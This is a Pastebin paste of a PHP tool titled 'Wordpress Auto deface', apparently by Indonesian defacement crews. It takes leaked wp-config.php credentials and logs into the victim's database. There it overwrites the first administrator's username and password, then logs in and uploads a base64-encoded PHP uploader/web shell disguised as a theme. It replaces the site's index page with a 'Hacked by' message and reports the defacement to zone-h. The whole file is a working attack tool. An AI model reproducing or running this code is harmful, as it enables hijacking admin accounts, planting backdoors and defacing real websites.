Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <title>Wordpress Auto deface</title>
- <body style="background-color:#2ECC71">
- <style type="text/css">
- input{
- border: 1px solid;
- overflow: hidden;
- background: #2e2b28;
- color: white;
- -moz-border-radius: 5px;
- -webkit-border-radius: 5px;
- border-radius: 5px;
- }
- .Header {
- background: #29447E;
- text-align:center;
- padding:10px; color:
- #fff; font-weight:bold;
- }
- textarea{
- border: 1px solid;
- overflow: hidden;
- background: #29447E;
- color: #29447E;
- -moz-border-radius: 5px;
- -webkit-border-radius: 5px;
- border-radius: 5px;
- }
- </style>
- </head>
- <body>
- <div class="Header">Wordpress Auto Deface</div>
- <table>
- <tr><td><form method="post"></td></tr>
- <tr><td align="right" style="width:5%;"><textarea placeholder="Content of wp-config.php" style="padding: 5px; resize: none; width: 500px; height: 250px; border: solid 1px #eceff5; background: #29447E; padding: 10px; margin: 0; text-align: justify; line-height: px; color: white; font-size: 15px" name="link"></textarea><td><tr>
- <tr><td><input type="text" style="border: solid 1px #eceff5; background: #29447E; padding: 3px; margin: 0; text-align: justify; line-height: ; color: white; font-size: ; width: 500px; height: 35px;" name="lunk" placeholder="http://indonesiaislamic.com/Black_Grab/k54525-wp-config.php"></td>
- <tr><td><input type="text" style="border: solid 1px #eceff5; background: #29447E; padding: 3px; margin: 0; text-align: justify; line-height: ; color: white; font-size: ; width: 300px; height: 35px;" name="hack" value="Hacked by ./Bl4ckcod37 | RES7OCK CREW"><input style="width:40%; height:37px;" type="submit" value="Exploit!"></td></tr><br>
- </form>
- </table>
- </body>
- </html>
- <?php
- // Original code by Tu5b0l3d
- // Recoded by ./Bl4ckcod37
- // Thanks to Allah SWT , INDO}{PLOIT
- error_reporting(0);
- if($_POST){
- function ambilKata($param, $kata1, $kata2){
- if(strpos($param, $kata1) === FALSE) return FALSE;
- if(strpos($param, $kata2) === FALSE) return FALSE;
- $start = strpos($param, $kata1) + strlen($kata1);
- $end = strpos($param, $kata2, $start);
- $return = substr($param, $start, $end - $start);
- return $return;
- }
- function anucurl($sites){
- $ch1 = curl_init ("$sites");
- curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
- $data = curl_exec ($ch1);
- return $data;
- }
- function save($data){
- $fp = @fopen("IndoXploit.htm", "a") or die("cant open file");
- fwrite($fp, $data);
- fclose($fp);
- }
- function lohgin($cek, $web, $userr, $pass){
- $post = array(
- "log" => "$userr",
- "pwd" => "$pass",
- "rememberme" => "forever",
- "wp-submit" => "Log In",
- "redirect_to" => "$web/wp-admin/",
- "testcookie" => "1",
- );
- $ch = curl_init ("$cek");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $data6 = curl_exec ($ch);
- return $data6;
- }
- $pemilik ="./Bl4ckcod37";
- $jones ="http://www.zone-h.com/notify/single";
- $script ="Hacked by ./Bl4ckcod37 | RES7OCK CREW";
- $lunk = $_POST['lunk'];
- $link = $_POST['link'];
- $gas = $_POST['hack'];
- if($lunk==""){
- $host = ambilkata($link,"DB_HOST', '","'");
- $username = ambilkata($link,"DB_USER', '","'");
- $password = ambilkata($link,"DB_PASSWORD', '","'");
- $db = ambilkata($link,"DB_NAME', '","'");
- $dbprefix = ambilkata($link,"table_prefix = '","'");
- $user_baru = "xxx";
- $password_baru = "xxx";
- $prefix = $db.".".$dbprefix."users";
- $sue = $db.".".$dbprefix."options";
- $pass = md5("$password_baru");
- echo "Database Content :<br>";
- echo "   Db Host         : $host<br>";
- echo "   Db user          : $username<br>";
- echo "   Db Password : $password<br>";
- echo "   Db name        : $db<br>";
- echo "   Table_Prefix : $dbprefix<br>";
- mysql_connect($host,$username,$password) or die("<font color='red'>Gagal masuk Database ..</font>");
- mysql_select_db($db) or die("<font color='red'>Database tidak dapat dibuka .. </font>");
- $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
- $r=mysql_fetch_array($tampil);
- $id = $r[ID];
- $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
- $r2=mysql_fetch_array($tampil2);
- $target = $r2[option_value];
- echo "$target<br>";
- mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
- $site= "$target/wp-login.php";
- $site2= "$target/wp-admin/theme-install.php?upload";
- $a = lohgin($site, $target, $user_baru, $password_baru);
- $b = lohgin($site2, $target, $user_baru, $password_baru);
- $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
- echo "token : $anu2<br>";
- $upload3 = base64_decode("c3Vrc2VzISEhIQ0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQoNCj8+DQo8P3BocA0KaWYoJF9HRVRbJ3JlcyddID09ICc3Jyl7DQokYTEgPSANCiANCidaV05vYnlBblBHTmxiblJsY2o1UVNGQWdWVzVoYldVZ09pQThZajRuT3cwS1pXTm9ieUJ3YUhCZmRXNWhiV1VvS1RzTkNtVmphRzhnSnp3dllqNG5PdzBLWldOb2J5QW5QR1p2Y20wZ1lXTjBhVzl1UFNJaUlHMWxkR2h2WkQwaWNHOXpkQ0lnWlc1amRIbHdaVDBpYlhWc2RHbHdZWEowTDJadmNtMHRaR0YwWVNJZ2JtRnRaVDBpZFhCc2IyRmtaWElpSUdsa1BTSjFjR3h2WVdSbGNpSStKenNOQ21WamFHOGdKenhwYm5CMWRDQjBlWEJsUFNKbWFXeGxJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0kxTUNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlIUjVjR1U5SW5OMVltMXBkQ0lnYVdROUlsOTFjR3dpSUEwS0RRcDJZV3gxWlQwaVZYQnNiMkZrSWo0OFluSStQR1p2Ym5RZ1kyOXNiM0k5STBaR1JqNUdWa05MUEM5bWIyNTBQand2Wm05eWJUNG5PdzBLYVdZb0lDUmZVRTlUVkZzblgzVndiQ2RkSUQwOUlDSlZjR3h2WVdRaUlDa2dldzBLQ1dsbUtFQmpiM0I1S0NSZlJrbE1SVk5iSjJacGJHVW5YVnNuZEcxd1gyNWhiV1VuWFN3Z0pGOUdTVXhGVTFzblptbHNaU2RkV3lkdVlXMWxKMTBwS1NCN0lHVmphRzhnSjFWd2JHOWhaQ0JUZFdOalpYTnpJQ0VoSnpzZ2ZRMEtDV1ZzYzJVZ2V5QmxZMmh2SUNkVmNHeHZZV1FnUm1GcGJDQWhJU2M3SUgwTkNuME5DbVZqYUc4Z0p6d3ZZMlZ1ZEdWeVBpYzcnOw0KICAgIGV2YWwoYmFzZTY0X2RlY29kZSgkYTEpKTsNCn0NCj8+");
- $www = "m.php";
- $fp5 = fopen($www,"w");
- fputs($fp5,$upload3);
- $post2 = array(
- "_wpnonce" => "$anu2",
- "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
- "themezip" => "@$www",
- "install-theme-submit" => "Install Now",
- );
- $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $data3 = curl_exec ($ch);
- $y = date("Y");
- $m = date("m");
- $namafile = "id.php";
- $fpi = fopen($namafile,"w");
- fputs($fpi,$script);
- $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
- curl_setopt($ch6, CURLOPT_POST, true);
- curl_setopt($ch6, CURLOPT_POSTFIELDS,
- array('file3'=>"@$namafile"));
- curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
- $postResult = curl_exec($ch6);
- curl_close($ch6);
- $as = "$target/k.php";
- $bs = anucurl($as);
- if(preg_match("#hacked#si",$bs)){
- echo "<font color='green'>Berhasil deface...</font><br>";
- echo "$as<br>";
- echo "Zone-h: ";
- $ch3 = curl_init ("$jones");
- curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch3, CURLOPT_POST, 1);
- curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$pemilik&domain1=$as&hackmode=1&reason=1");
- if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
- echo " Ok <br><br>";
- }else{
- echo " No <br><br>";}
- }
- else{
- echo "<font color='red'>Gagal deface...</font><br>";
- echo "Manual deface: <br>";
- echo "$target/wp-login.php<br>";
- echo "Username: $user_baru<br>";
- echo "Password: $password_baru<br>";
- }
- }
- }
- if($link==""){
- $file = anucurl($lunk);
- $host = ambilkata($file,"DB_HOST', '","'");
- $username = ambilkata($file,"DB_USER', '","'");
- $password = ambilkata($file,"DB_PASSWORD', '","'");
- $db = ambilkata($file,"DB_NAME', '","'");
- $dbprefix = ambilkata($file,"table_prefix = '","'");
- $user_baru = "xxx";
- $password_baru = "xxx";
- $prefix = $db.".".$dbprefix."users";
- $sue = $db.".".$dbprefix."options";
- $pass = md5("$password_baru");
- echo "Database Content :<br>";
- echo "   Db Host         : $host<br>";
- echo "   Db user          : $username<br>";
- echo "   Db Password : $password<br>";
- echo "   Db name        : $db<br>";
- echo "   Table_Prefix : $dbprefix<br>";
- mysql_connect($host,$username,$password) or die("<font color='red'>Gagal masuk Database ..</font>");
- mysql_select_db($db) or die("<font color='red'>Database tidak dapat dibuka .. </font>");
- $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
- $r=mysql_fetch_array($tampil);
- $id = $r[ID];
- $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
- $r2=mysql_fetch_array($tampil2);
- $target = $r2[option_value];
- echo "# $target<br>";
- mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
- $site= "$target/wp-login.php";
- $site2= "$target/wp-admin/theme-install.php?upload";
- $a = lohgin($site, $target, $user_baru, $password_baru);
- $b = lohgin($site2, $target, $user_baru, $password_baru);
- $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
- echo "# token -> $anu2<br>";
- $upload3 = base64_decode("c3Vrc2VzISEhIQ0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iaW5kZXgucGhwIjsNCiAgICAgICAgICAgICAgICBpZiAoZmlsZV9leGlzdHMoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKSkgdW5saW5rKCIuLi8uLi8uLi8uLi8iLiRuZXdmaWxlMyk7DQogICAgICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZTNbJ3RtcF9uYW1lJ10sICIuLi8uLi8uLi8uLi8kbmV3ZmlsZTMiKTsNCg0KDQo/Pg0KPD9waHANCmlmKCRfR0VUWydyZXMnXSA9PSAnNycpew0KJGExID0gDQogDQonWldOb2J5QW5QR05sYm5SbGNqNVFTRkFnVlc1aGJXVWdPaUE4WWo0bk93MEtaV05vYnlCd2FIQmZkVzVoYldVb0tUc05DbVZqYUc4Z0p6d3ZZajRuT3cwS1pXTm9ieUFuUEdadmNtMGdZV04wYVc5dVBTSWlJRzFsZEdodlpEMGljRzl6ZENJZ1pXNWpkSGx3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdibUZ0WlQwaWRYQnNiMkZrWlhJaUlHbGtQU0oxY0d4dllXUmxjaUkrSnpzTkNtVmphRzhnSnp4cGJuQjFkQ0IwZVhCbFBTSm1hV3hsSWlCdVlXMWxQU0ptYVd4bElpQnphWHBsUFNJMU1DSStQR2x1Y0hWMElHNWhiV1U5SWw5MWNHd2lJSFI1Y0dVOUluTjFZbTFwZENJZ2FXUTlJbDkxY0d3aUlBMEtEUXAyWVd4MVpUMGlWWEJzYjJGa0lqNDhZbkkrUEdadmJuUWdZMjlzYjNJOUkwWkdSajVHVmtOTFBDOW1iMjUwUGp3dlptOXliVDRuT3cwS2FXWW9JQ1JmVUU5VFZGc25YM1Z3YkNkZElEMDlJQ0pWY0d4dllXUWlJQ2tnZXcwS0NXbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0oxVndiRzloWkNCVGRXTmpaWE56SUNFaEp6c2dmUTBLQ1dWc2MyVWdleUJsWTJodklDZFZjR3h2WVdRZ1JtRnBiQ0FoSVNjN0lIME5DbjBOQ21WamFHOGdKend2WTJWdWRHVnlQaWM3JzsNCiAgICBldmFsKGJhc2U2NF9kZWNvZGUoJGExKSk7DQp9DQo/Pg==");
- $www = "m.php";
- $fp5 = fopen($www,"w");
- fputs($fp5,$upload3);
- $post2 = array(
- "_wpnonce" => "$anu2",
- "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
- "themezip" => "@$www",
- "install-theme-submit" => "Install Now",
- );
- $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $data3 = curl_exec ($ch);
- $y = date("Y");
- $m = date("m");
- $namafile = "index.php";
- $fpi = fopen($namafile,"w");
- fputs($fpi,$script);
- $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
- curl_setopt($ch6, CURLOPT_POST, true);
- curl_setopt($ch6, CURLOPT_POSTFIELDS,
- array('file3'=>"@$namafile"));
- curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
- $postResult = curl_exec($ch6);
- curl_close($ch6);
- $as = "$target/index.php";
- $bs = anucurl($as);
- if(preg_match("#hacked#si",$bs)){
- echo "<font color='green'>Berhasil deface...</font><br>";
- echo "$as<br>";
- echo "Zone-h: ";
- $ch3 = curl_init ("$jones");
- curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch3, CURLOPT_POST, 1);
- curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$pemilik&domain1=$as&hackmode=1&reason=1");
- if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
- echo " Ok <br><br>";
- }else{
- echo " No <br><br>";}
- }
- else{
- echo "<font color='red'>Gagal deface...</font><br>";
- echo "Manual deface: <br>";
- echo "$target/wp-login.php<br>";
- echo "Username: $user_baru<br>";
- echo "Password: $password_baru<br>";
- }
- }
- ?>
Add Comment
Please, Sign In to add comment